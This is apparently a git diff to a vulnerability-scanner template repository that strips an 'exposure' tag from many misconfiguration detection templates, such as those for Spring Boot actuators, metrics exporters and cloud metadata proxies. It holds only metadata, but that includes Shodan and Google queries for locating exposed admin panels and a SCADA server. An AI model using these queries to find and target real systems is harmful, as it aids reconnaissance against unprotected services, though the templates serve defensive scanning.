b/http/misconfiguration/moleculer-microservices.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Moleculer Microservices Project" - tags: misconfig,microservice,moleculer,exposure + tags: misconfig,microservice,moleculer http: - method: GET diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index 7456b8b552..48b5ccc8b2 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 reference: - https://github.com/percona/mongodb_exporter - tags: mongodb,exposure,debug,misconfig + tags: mongodb,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/mysqld-exporter-metrics.yaml b/http/misconfiguration/mysqld-exporter-metrics.yaml index 4b8ab53da1..c4288ed2ee 100644 --- a/http/misconfiguration/mysqld-exporter-metrics.yaml +++ b/http/misconfiguration/mysqld-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"MySQLd exporter" - tags: mysqld,exposure,debug,misconfig + tags: mysqld,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index 5f816d4696..f5d29af977 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Named Process Exporter" - tags: namedprocess,exposure,debug,misconfig + tags: namedprocess,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index 712d75131a..16df710958 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure,debug,misconfig + tags: node,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index 38d855fb20..f69624d90c 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Configure ntop" - tags: misconfig,ntop,exposure + tags: misconfig,ntop http: - method: GET diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index 6f2b06c0cb..1341cc8055 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -17,7 +17,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OneinStack" - tags: misconfig,exposure,panel,oneinstack + tags: misconfig,panel,oneinstack http: - method: GET diff --git a/http/misconfiguration/pa11y-dashboard.yaml b/http/misconfiguration/pa11y-dashboard.yaml index 1cd110590a..3487da57c1 100644 --- a/http/misconfiguration/pa11y-dashboard.yaml +++ b/http/misconfiguration/pa11y-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Pa11y Dashboard" - tags: misconfig,exposure,pa11y + tags: misconfig,pa11y http: - method: GET diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index 5c3330f429..87b5274549 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: exposure,panel,pghero,misconfig + tags: panel,pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/phpmemcached-admin-panel.yaml b/http/misconfiguration/phpmemcached-admin-panel.yaml index 71370a61c7..4ee30b5823 100644 --- a/http/misconfiguration/phpmemcached-admin-panel.yaml +++ b/http/misconfiguration/phpmemcached-admin-panel.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"phpMemcachedAdmin" - tags: phpmemcached,exposure,misconfig + tags: phpmemcached,misconfig http: - method: GET diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 1a60b3097b..f2136eefb4 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Postgres exporter" - tags: postgres,exposure,debug,misconfig + tags: postgres,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index 25b48cb168..f21c911d06 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -5,7 +5,7 @@ info: author: aashiq severity: high description: Searches for private key exposure by attempting to query the helper endpoint on node_modules - tags: exposure,node,misconfig + tags: node,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/proxy/metadata-alibaba.yaml b/http/misconfiguration/proxy/metadata-alibaba.yaml index fa218fd9fd..258d3f383f 100644 --- a/http/misconfiguration/proxy/metadata-alibaba.yaml +++ b/http/misconfiguration/proxy/metadata-alibaba.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,alibaba,proxy,misconfig,metadata + tags: config,alibaba,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 997490509c..9277e43bda 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,proxy,aws,amazon,misconfig,metadata + tags: proxy,aws,amazon,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-azure.yaml b/http/misconfiguration/proxy/metadata-azure.yaml index 554164e929..bc0e6b9283 100644 --- a/http/misconfiguration/proxy/metadata-azure.yaml +++ b/http/misconfiguration/proxy/metadata-azure.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,azure,microsoft,proxy,misconfig,metadata + tags: config,azure,microsoft,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-digitalocean.yaml b/http/misconfiguration/proxy/metadata-digitalocean.yaml index 1c49028334..2e2dc9c747 100644 --- a/http/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/http/misconfiguration/proxy/metadata-digitalocean.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,digitalocean,proxy,misconfig,metadata + tags: config,digitalocean,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-google.yaml b/http/misconfiguration/proxy/metadata-google.yaml index 3ffc361fb7..145dc4042f 100644 --- a/http/misconfiguration/proxy/metadata-google.yaml +++ b/http/misconfiguration/proxy/metadata-google.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,google,gcp,proxy,misconfig,metadata + tags: config,google,gcp,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-hetzner.yaml b/http/misconfiguration/proxy/metadata-hetzner.yaml index 460f307796..519918f8e0 100644 --- a/http/misconfiguration/proxy/metadata-hetzner.yaml +++ b/http/misconfiguration/proxy/metadata-hetzner.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,hetzner,proxy,misconfig,metadata + tags: config,hetzner,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-openstack.yaml b/http/misconfiguration/proxy/metadata-openstack.yaml index cfc1139326..9475628423 100644 --- a/http/misconfiguration/proxy/metadata-openstack.yaml +++ b/http/misconfiguration/proxy/metadata-openstack.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,openstack,proxy,misconfig,metadata + tags: config,openstack,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-oracle.yaml b/http/misconfiguration/proxy/metadata-oracle.yaml index 866f0ebbac..23d1669e6a 100644 --- a/http/misconfiguration/proxy/metadata-oracle.yaml +++ b/http/misconfiguration/proxy/metadata-oracle.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,oracle,proxy,misconfig,metadata + tags: config,oracle,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml index 1d2c520930..8f8a765e97 100644 --- a/http/misconfiguration/proxy/open-proxy-internal.yaml +++ b/http/misconfiguration/proxy/open-proxy-internal.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz + tags: config,proxy,misconfig,fuzz metadata: max-request: 25 diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml index f5edeaddff..15c0718ee7 100644 --- a/http/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz + tags: config,proxy,misconfig,fuzz metadata: max-request: 6 diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml index a4a9953167..05f7aa41ae 100644 --- a/http/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz + tags: config,proxy,misconfig,fuzz metadata: max-request: 8 diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml index 0430efbf75..ed55bc6a69 100644 --- a/http/misconfiguration/puppetdb-dashboard.yaml +++ b/http/misconfiguration/puppetdb-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: 'title:"PuppetDB: Dashboard"' - tags: misconfig,exposure,puppetdb + tags: misconfig,puppetdb http: - method: GET diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 33c9dabef0..7b404b8819 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: html:"python_gc_objects_collected_total" - tags: exposure,devops,python,misconfig + tags: devops,python,misconfig http: - method: GET diff --git a/http/misconfiguration/questdb-console.yaml b/http/misconfiguration/questdb-console.yaml index 606cc07843..05d2dc0e36 100644 --- a/http/misconfiguration/questdb-console.yaml +++ b/http/misconfiguration/questdb-console.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"QuestDB · Console" - tags: misconfig,questdb,exposure + tags: misconfig,questdb http: - method: GET diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index 0dcf11311e..7d2540baab 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"RabbitMQ Exporter" - tags: rabbitmq,exposure,debug,misconfig + tags: rabbitmq,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 46563d9b18..2cb2f931f1 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Ray Dashboard" - tags: misconfig,exposure,ray + tags: misconfig,ray http: - method: GET diff --git a/http/misconfiguration/rekognition-image-validation.yaml b/http/misconfiguration/rekognition-image-validation.yaml index 5451d00b37..ae9c558d8c 100644 --- a/http/misconfiguration/rekognition-image-validation.yaml +++ b/http/misconfiguration/rekognition-image-validation.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Rekognition Image Validation Debug UI" - tags: misconfig,exposure + tags: misconfig http: - method: GET diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index 54ccbaa7a1..b9ba873fda 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -12,7 +12,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: aura,unauth,salesforce,exposure,misconfig + tags: aura,unauth,salesforce,misconfig metadata: max-request: 5 diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index 17757f869a..4691e87af9 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -7,7 +7,7 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service,edb,misconfig + tags: listing,service,edb,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index 1b0d1811b0..fe16ef1415 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: panel,exposure,setup,github,misconfig + tags: panel,setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/skycaiji-install.yaml b/http/misconfiguration/skycaiji-install.yaml index 615c3e8de8..a904e32191 100644 --- a/http/misconfiguration/skycaiji-install.yaml +++ b/http/misconfiguration/skycaiji-install.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: SkyCaiji was discovered. - tags: tech,skycaiji,exposure,misconfig + tags: tech,skycaiji,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index ad807a9c61..eba92b618e 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Welcome to SmarterStats!" - tags: misconfig,smarterstats,exposure + tags: misconfig,smarterstats http: - method: GET diff --git a/http/misconfiguration/sony-bravia-disclosure.yaml b/http/misconfiguration/sony-bravia-disclosure.yaml index 1c4b90e8f2..41839a10b3 100644 --- a/http/misconfiguration/sony-bravia-disclosure.yaml +++ b/http/misconfiguration/sony-bravia-disclosure.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt - tags: misconfig,sony,unauth,exposure + tags: misconfig,sony,unauth metadata: max-request: 1 diff --git a/http/misconfiguration/spidercontrol-scada-server-info.yaml b/http/misconfiguration/spidercontrol-scada-server-info.yaml index 12425346e1..4ee0cf43a0 100644 --- a/http/misconfiguration/spidercontrol-scada-server-info.yaml +++ b/http/misconfiguration/spidercontrol-scada-server-info.yaml @@ -7,7 +7,7 @@ info: description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. reference: - https://spidercontrol.net/spidercontrol-inside/ - tags: spidercontrol,scada,exposure,misconfig + tags: spidercontrol,scada,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/springboot/spring-eureka.yaml b/http/misconfiguration/springboot/spring-eureka.yaml index 5e4a3306c2..d09e0ee49a 100644 --- a/http/misconfiguration/springboot/spring-eureka.yaml +++ b/http/misconfiguration/springboot/spring-eureka.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure,eureka + tags: misconfig,springboot,eureka http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-auditevents.yaml b/http/misconfiguration/springboot/springboot-auditevents.yaml index 28e185e220..cc63edc850 100644 --- a/http/misconfiguration/springboot/springboot-auditevents.yaml +++ b/http/misconfiguration/springboot/springboot-auditevents.yaml @@ -15,7 +15,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-autoconfig.yaml b/http/misconfiguration/springboot/springboot-autoconfig.yaml index 234ebfacb7..374cb85670 100644 --- a/http/misconfiguration/springboot/springboot-autoconfig.yaml +++ b/http/misconfiguration/springboot/springboot-autoconfig.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-beans.yaml b/http/misconfiguration/springboot/springboot-beans.yaml index bdca65d657..bf1e5a9e1f 100644 --- a/http/misconfiguration/springboot/springboot-beans.yaml +++ b/http/misconfiguration/springboot/springboot-beans.yaml @@ -5,7 +5,7 @@ info: author: ajaysenr severity: low description: Displays a complete list of all the Spring beans in the application - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-caches.yaml b/http/misconfiguration/springboot/springboot-caches.yaml index 2c11de9e0b..d49ff3ea37 100644 --- a/http/misconfiguration/springboot/springboot-caches.yaml +++ b/http/misconfiguration/springboot/springboot-caches.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-conditions.yaml b/http/misconfiguration/springboot/springboot-conditions.yaml index 0c9b63c4ff..ee6be25799 100644 --- a/http/misconfiguration/springboot/springboot-conditions.yaml +++ b/http/misconfiguration/springboot/springboot-conditions.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-configprops.yaml b/http/misconfiguration/springboot/springboot-configprops.yaml index 65df3dff42..f0c393bc03 100644 --- a/http/misconfiguration/springboot/springboot-configprops.yaml +++ b/http/misconfiguration/springboot/springboot-configprops.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Sensitive environment variables may not be masked - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-dump.yaml b/http/misconfiguration/springboot/springboot-dump.yaml index 5719fb3b15..ddefb3807c 100644 --- a/http/misconfiguration/springboot/springboot-dump.yaml +++ b/http/misconfiguration/springboot/springboot-dump.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Performs a thread dump - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-env.yaml b/http/misconfiguration/springboot/springboot-env.yaml index 2f22ea0929..ae588f79f5 100644 --- a/http/misconfiguration/springboot/springboot-env.yaml +++ b/http/misconfiguration/springboot/springboot-env.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb,philippedelteil,stupidfish severity: low description: Sensitive environment variables may not be masked - tags: misconfig,springboot,env,exposure + tags: misconfig,springboot,env metadata: max-request: 4 diff --git a/http/misconfiguration/springboot/springboot-features.yaml b/http/misconfiguration/springboot/springboot-features.yaml index b937281862..62c5f69f08 100644 --- a/http/misconfiguration/springboot/springboot-features.yaml +++ b/http/misconfiguration/springboot/springboot-features.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-flyway.yaml b/http/misconfiguration/springboot/springboot-flyway.yaml index 9bd6ab4c88..90ee2074cc 100644 --- a/http/misconfiguration/springboot/springboot-flyway.yaml +++ b/http/misconfiguration/springboot/springboot-flyway.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,exposure,flyway + tags: misconfig,springboot,flyway http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-gateway.yaml b/http/misconfiguration/springboot/springboot-gateway.yaml index ce528c8ca3..6383205788 100644 --- a/http/misconfiguration/springboot/springboot-gateway.yaml +++ b/http/misconfiguration/springboot/springboot-gateway.yaml @@ -7,7 +7,7 @@ info: description: Sensitive environment variables may not be masked reference: - https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-health.yaml b/http/misconfiguration/springboot/springboot-health.yaml index b455d4cc05..e6fee86e20 100644 --- a/http/misconfiguration/springboot/springboot-health.yaml +++ b/http/misconfiguration/springboot/springboot-health.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-heapdump.yaml b/http/misconfiguration/springboot/springboot-heapdump.yaml index 1ff74d04f9..f7ff0823a6 100644 --- a/http/misconfiguration/springboot/springboot-heapdump.yaml +++ b/http/misconfiguration/springboot/springboot-heapdump.yaml @@ -7,7 +7,7 @@ info: description: A Spring Boot Actuator heap dump was detected. A heap dump is a snapshot of JVM memory, which could expose environment variables and HTTP requests. reference: - https://github.com/pyn3rd/Spring-Boot-Vulnerability - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-httptrace.yaml b/http/misconfiguration/springboot/springboot-httptrace.yaml index 795b25dcca..727c4ba803 100644 --- a/http/misconfiguration/springboot/springboot-httptrace.yaml +++ b/http/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-jolokia.yaml b/http/misconfiguration/springboot/springboot-jolokia.yaml index 6fb5be4816..166e3e01a4 100644 --- a/http/misconfiguration/springboot/springboot-jolokia.yaml +++ b/http/misconfiguration/springboot/springboot-jolokia.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-liquidbase.yaml b/http/misconfiguration/springboot/springboot-liquidbase.yaml index 3f335e23e4..9ad2413258 100644 --- a/http/misconfiguration/springboot/springboot-liquidbase.yaml +++ b/http/misconfiguration/springboot/springboot-liquidbase.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,exposure,liquibase + tags: misconfig,springboot,liquibase http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-logfile.yaml b/http/misconfiguration/springboot/springboot-logfile.yaml index d7076448f0..a0aa041e4d 100644 --- a/http/misconfiguration/springboot/springboot-logfile.yaml +++ b/http/misconfiguration/springboot/springboot-logfile.yaml @@ -10,7 +10,7 @@ info: max-request: 3 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggerconfig.yaml b/http/misconfiguration/springboot/springboot-loggerconfig.yaml index 01a0229a8a..be82a40bba 100644 --- a/http/misconfiguration/springboot/springboot-loggerconfig.yaml +++ b/http/misconfiguration/springboot/springboot-loggerconfig.yaml @@ -15,7 +15,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 85408ca4ac..ff4faafad1 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,7 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-mappings.yaml b/http/misconfiguration/springboot/springboot-mappings.yaml index 17f602c958..15c3c94473 100644 --- a/http/misconfiguration/springboot/springboot-mappings.yaml +++ b/http/misconfiguration/springboot/springboot-mappings.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-metrics.yaml b/http/misconfiguration/springboot/springboot-metrics.yaml index 4920f564f2..648ce688d5 100644 --- a/http/misconfiguration/springboot/springboot-metrics.yaml +++ b/http/misconfiguration/springboot/springboot-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Additional routes may be displayed - tags: springboot,exposure,misconfig + tags: springboot,misconfig metadata: max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml index 9a0cbb9e02..449bb6f48a 100644 --- a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml +++ b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 2 verified: true - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-status.yaml b/http/misconfiguration/springboot/springboot-status.yaml index a925f7dd68..674ee512dd 100644 --- a/http/misconfiguration/springboot/springboot-status.yaml +++ b/http/misconfiguration/springboot/springboot-status.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-trace.yaml b/http/misconfiguration/springboot/springboot-trace.yaml index f7751037cf..2de0064bde 100644 --- a/http/misconfiguration/springboot/springboot-trace.yaml +++ b/http/misconfiguration/springboot/springboot-trace.yaml @@ -5,7 +5,7 @@ info: author: that_juan_,dwisiswant0,wdahlenb severity: low description: View recent HTTP requests and responses - tags: misconfig,springboot,exposure + tags: misconfig,springboot metadata: max-request: 1 diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 88fa143a35..58c40b3686 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -10,7 +10,7 @@ info: max-request: 2 verified: true google-query: inurl:"/Reports/Pages/Folder.aspx" - tags: misconfig,sql,report,exposure + tags: misconfig,sql,report http: - raw: diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 74241d85e0..54ae488412 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: http.html:'ng-app="syncthing"' - tags: misconfig,syncthing,exposure + tags: misconfig,syncthing http: - method: GET diff --git a/http/misconfiguration/system-properties-exposure.yaml b/http/misconfiguration/system-properties-exposure.yaml index 10f4948bfc..69bf227c32 100644 --- a/http/misconfiguration/system-properties-exposure.yaml +++ b/http/misconfiguration/system-properties-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"System Properties" - tags: misconfig,system,exposure + tags: misconfig,system http: - method: GET diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index e60c234a24..1e1f1bb4d5 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tasmota" - tags: 